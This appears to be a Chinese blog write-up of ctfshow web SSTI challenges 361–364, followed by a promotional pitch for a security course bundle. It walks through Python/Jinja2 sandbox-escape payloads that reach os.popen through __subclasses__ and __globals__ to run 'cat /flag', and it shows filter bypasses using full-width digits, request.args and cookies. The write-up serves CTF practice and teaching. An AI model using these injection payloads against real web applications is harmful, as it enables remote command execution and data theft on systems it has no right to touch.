ctfshow web入门 SSTI

得到str的类对象。
2. 获取基类

"".__class__.__bases__[0]

这会得到str类的基类列表,其中第一个元素是object类。
3. 获取object类的所有子类

"".__class__.__bases__[0].__subclasses__()

返回一个包含Python中所有类的列表,这些类都是直接或间接从object继承的。
4. 选择特定的子类

"".__class__.__bases__[0].__subclasses__()[132]

选择了列表中的第133个元素(因为索引是从0开始的)。
5. 访问Popen类的初始化方法的全局变量

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__

通过访问Popen类的__init__方法的__globals__属性,可以获得一个字典,其中包含Popen类定义时可用的所有全局变量。
6. 调用popen

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']

从全局变量字典中获取名为popen的变量
7. 执行系统命令

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag')

使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。
8. 读取命令输出

调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。

payload

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()

362

传参试试

轮流试试每个数字,发现只有2和3被过滤

而且只要字符串不包括2和3就能显示

使用全角数字进行绕过

关闭使用半角输入模式

“1234567890”

payload:

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

363

数字没有被过滤掉

经过各种字母和符号尝试,发现会过滤“”

试试把“”进行url编码看看

还是会被过滤

但是传参会自动补齐双引号,所以索性不加了

?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()

364

它将arg过滤掉了,所以没有办法直接GET传参

改用Cookie传

本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。

最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。

最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值